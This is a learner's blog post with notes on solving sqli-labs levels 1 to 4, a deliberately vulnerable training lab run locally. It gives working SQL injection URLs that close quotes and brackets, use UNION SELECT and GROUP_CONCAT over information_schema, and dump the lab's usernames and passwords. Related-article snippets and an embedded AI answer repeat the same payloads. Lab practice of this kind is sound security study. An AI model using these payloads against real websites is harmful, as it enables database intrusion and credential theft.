【sqli-labs】Less1~Less4

最新推荐文章于 2025-08-21 23:21:52 发布
最新推荐文章于 2025-08-21 23:21:52 发布
阅读量99 收藏
点赞数
文章标签: 数据库
本文详细介绍如何利用SQL注入漏洞获取数据库信息。通过实例演示了不同类型的SQL注入攻击方法,包括单引号、整数、带干扰字符串及双引号类型的注入,并展示了如何使用联合查询、GROUP_CONCAT等技术提取敏感数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

学习sql注入啦,一下都是我做sqli-labs时的笔记。可能有错误,如果有人发现了欢迎指正~~

 

常用知识点:

1.mysql注释有三种:① #: 注释从#到行尾

                                 ② --空格: 注释到行尾,注意--后必须有空格

                                 ③/**/ :注释/* 到 */的内容

2.查询用户数据库名称

select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMA LIMIT 0,1

3.查询当前数据库表

select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=(select DATABASE()) limit 0,1

4.查询指定表的所有字段

select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='xxx' LIMIT 0,1

5.联合查询

select id, username, password from users union select 1,2,3

6.将多行结果拼成一行GROUP_CONCAT

select group_concat(user) from table limit 0, 1

用group_concat可把多个结果拼成一行。这样,如果只有一个显示位也可以显示所有信息

7.将多个字段拼成一个字段CONCAT

select concat(username, passwd) from table

 

 

Less-1: 有错误信息,单引号

基础语句:http://127.0.0.1/sqli-labs/Less-1/?id=

1.测试id类型是否为字符串,用单引号'测试

http://127.0.0.1/sqli-labs/Less-1/?id='

提示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1

出现了''',说明id为字符串类型

2.测试查询时有几个字段, 用union,经测试有3段,且2,3段会展示

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3 -- a
http://127.0.0.1/sqli-labs/Less-1/?id=%27%20union%20select%201,2,3%20--%20a

3.查询数据库中的数据

①查询数据库中的所有表信息

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,GROUP_CONCAT(TABLE_NAME),3 from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(select DATABASE()) LIMIT 0,1 -- a

结果:Your Login name:emails,referers,uagents,users

说明有四张表

②查看users表中的所有字段

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1, GROUP_CONCAT(COLUMN_NAME),3 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' LIMIT 0,1 -- a

结果:Your Login name:id,username,password

③查询所有的用户名密码

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users LIMIT 0,1 -- a

结果:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

疑问:

为什么注释用-- a可以,用#就不可以?

 

Less-2: 错误,整数

①测试id类型

http://127.0.0.1/sqli-labs/Less-2/?id='

结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

报错了只有' LIMIT 0,1,说明id是数字型的,没有其他引号包裹

②查询所有用户名和密码,加入了order by 保证显示的是所有内容。中间步骤跟第一题相同,略过。

http://127.0.0.1/sqli-labs/Less-2/?id=3 union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a

 

Less-3: 错误,有干扰的字符串

①测试id类型

http://127.0.0.1/sqli-labs/Less-3/?id='

结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

与第一题的不同之处在于id后面还有个括号,可以推断其id的写法是 id = ('3') 这种格式。所以在构造sql时,除了要注意闭合引号,还要注意闭合括号。

②查询所有用户名和密码

http://127.0.0.1/sqli-labs/Less-3/?id=3') union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a

 

Less-4:错误,双引号

①测试id类型

http://127.0.0.1/sqli-labs/Less-4/?id='

结果正常输出,继续测试,这里偷懒了,根据名称直接试了双引号

http://127.0.0.1/sqli-labs/Less-4/?id="

结果:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") LIMIT 0,1' at line 1

说明id是字符串,且写法为id = ("3")

②获取所有用户名密码,闭合双引号和括号即可

http://127.0.0.1/sqli-labs/Less-4/?id=3") union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a

 

SQL注入sqli第四关(less-4
s_xcx_ah的博客
06-10 1608
SQLI第四关
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 906
一丢丢Sqli-labs小练习
sql-lab教程Less-1
Brucye
03-22 531
学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security'(此处拿security库为例) 查字段:select column_name from information_schema.columns where table_name='users'(此处拿users表
SQLI-Lab】-Less4
xinyue9966的博客
01-23 277
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-4/?id=1" 发现为字
sqli靶场通关之less4
sunxueer的博客
07-15 434
sqli less4 方法一:updatexml报错函数 1. 找闭合字符 id = 1”) //异常 id = 1”) and 1 =1 -- + //正确 id = 1”) and 1 =2 -- + //错误 说明可能存在双引号字符型注入 2. 求列数 id=1") order by 3 -- + id=1") order by 4 -- + 说明有3列 3. 求显示位 id=1") and 1=2 union select 1,2,3 -- + 4. 爆数据库名 id=1"
sqli-lab 闯关教程 Less-4
羽路星尘的博客
11-01 262
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 823
一丢丢Sqli-labs小练习
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1895
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2338
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
SQL之sqli-labs注入Less-2~4
Nuyoah的博客
12-13 521
Less-1相同,我们同样使用?id=1'看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里多加了一个引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同 2.接下来我们使用 order by 查看有多少列 仍然有三列3.使用联合查询 union select 看有哪些数据可以回显 4.接下来查询所有数据库 5.继续查询表 6.再查询列 7.最后取出所有数据 ...
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 858
初学sql注入SQLi-LABS过关分享Less-3
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 989
看完不会来打我
sqli-labs—————Less-4
Fly_鹏程万里
05-08 729
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1916
Less-4 less1-3以发布,1-4题相关知识点在https://blog.youkuaiyun.com/qq_46432288/article/details/109226871中,点击查看吧!!! less-41-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
sqli-labs (less1-less4)
Xi4or0uji
07-24 1822
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
缓存雪崩、缓存穿透、缓存击穿在实际中如何处理
Rookie
08-19 2136
也有一个更为简单粗暴的方法(我们采用的就是这种),如果一个查询返回的数据为空(不管是数 据不存在,还是。缓存穿透是指查询一个一定不存在的数据,由于缓存是不命中时被动写的,并且出于容错考虑,如果从存储层查不。到数据则不写入缓存,这将导致这个不存在的数据每次请求都要到存储层去查询,失去了缓存的意义。缓存雪崩是指在我们设置缓存时采用了相同的过期时间,导致缓存在某一时刻同时失效,请求全部转发到。系统故障),我们仍然把这个空结果进行缓存,但它的过期时间会很短,最长不超过五分钟。所以我们把过期时间存在。
MySQL数据库第一章
2301_76169459的博客
08-20 1059
MySQL数据库概述 MySQL是一种开源免费的关系型数据库管理系统,具有小巧、功能齐全、使用便捷等特点,适用于中小型甚至大型应用。数据库分为关系型(如MySQL、Oracle)和非关系型(如Redis、MongoDB)两类。MySQL通过SQL语言进行操作,包含数据定义语言(DDL)、数据操作语言(DML)、数据查询语言(DQL)和数据控制语言(DCL)。创建数据表时需要指定列类型(数值、字符串、日期时间等)和字段属性,并通过命令行或工具进行管理。
在职老D渗透日记day23:sqli-labs靶场通关(第29关-31关)http参数过滤
最新发布
渗透学习&在职小白&每日督促更新
08-21 588
waf好像没有生效,先照着跑跑。
sqli-labs less1
03-27
<think>好的,我现在需要处理用户关于sqli-labs Less 1的教程或解决方案的请求。首先,我得确认用户提到的sqli-labs是什么。sqli-libs是一个用于练习SQL注入攻击的实验平台,通常被安全研究人员和学习者用来测试和提升他们的技能。Less 1应该是指该平台的第一课,可能涉及基本的SQL注入技术。 接下来,我需要回忆或查找关于sqli-labs第一课的具体内容。通常,第一课可能是一个基于GET请求的字符型注入漏洞。用户可能需要知道如何利用这个漏洞,比如通过闭合引号、注释后续语句,然后使用UNION注入或其他方法获取数据库信息。 然后,我需要确保提供的解决方案步骤正确且详细。例如,确定注入点、测试闭合方式、使用ORDER BY确定列数,然后进行UNION查询获取数据库版本或表信息。同时,需要注意使用正确的语法,比如单引号闭合、注释符--+的使用,以及避免常见错误。 另外,用户可能还需要一些预防措施的建议,比如输入验证、参数化查询等,所以最后要包括防御方法。同时,根据用户之前的指示,生成相关问题,帮助用户进一步学习相关知识。 还要检查是否有站内引用需要添加,但根据用户提供的信息,目前没有具体的引用来源,所以可能需要忽略引用标识或假设某些引用。但根据用户示例,可能需要在某些步骤末尾添加引用标记,比如[^1],但需要确认是否有实际引用来源可用。如果没有的话,可能不需要添加,或者需要用户提供更多资料。 最后,确保回答使用中文,行内公式用$...$,独立公式用$$...$$,但在这个主题中可能用不到数学公式,所以可能可以忽略。但需要保持LaTeX语法正确,如果有变量或代码的话。代码部分需要用代码块包裹,如示例中的Python代码,但这里可能涉及SQL语句,所以需要用SQL的代码块。 总结步骤: 1. 介绍Less 1的基本情况。 2. 详细说明解决方案步骤,包括测试注入点、闭合引号、确定列数、执行UNION注入获取信息。 3. 提供防御建议。 4. 生成相关问题,如其他注入类型、工具使用、预防措施等。 5. 确保格式正确,代码块使用正确语言标记,如SQL。</think>[用户可见层] ### sqli-labs Less 1 解决方案 sqli-labs Less 1 是一个基于GET请求的单引号字符型SQL注入漏洞练习。以下是分步解决方案: #### 1. **确定注入点** 输入参数`id`存在漏洞,尝试添加单引号触发错误: ```sql http://example.com/sqli-labs/Less-1/?id=1' ``` 若返回SQL语法错误(如`You have an error in your SQL syntax`),则确认存在注入。 #### 2. **闭合引号并注释后续语句** 通过闭合单引号并使用注释符`--+`绕过: ```sql http://example.com/sqli-labs/Less-1/?id=1' --+ ``` 此时SQL语句变为: $$SELECT * FROM users WHERE id='1' --+' LIMIT 0,1$$ 注释符`--+`会忽略后续的`LIMIT`语句。 #### 3. **确定列数** 通过`ORDER BY`判断查询结果的列数: ```sql http://example.com/sqli-labs/Less-1/?id=1' ORDER BY 3 --+ ``` 若页面正常返回,说明查询结果有3列;若报错则减少列数重试。 #### 4. **UNION注入获取数据** 利用`UNION SELECT`联合查询获取数据库信息: ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,2,3 --+ ``` 页面会显示`2`和`3`的位置可用于回显数据。 **示例:获取数据库版本和当前数据库名** ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,version(),database() --+ ``` 回显结果类似: ``` 2: 10.3.32-MariaDB 3: security ``` #### 5. **进一步提取表名和字段名** 从`information_schema`中提取信息: ```sql http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 回显当前数据库的表名(如`emails,users`),再通过类似方法获取字段名。 --- ### 防御建议 1. **使用参数化查询**(如PDO预处理语句)避免拼接SQL[^1]。 2. **对输入进行严格过滤**,例如仅允许数字类型的`id`参数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值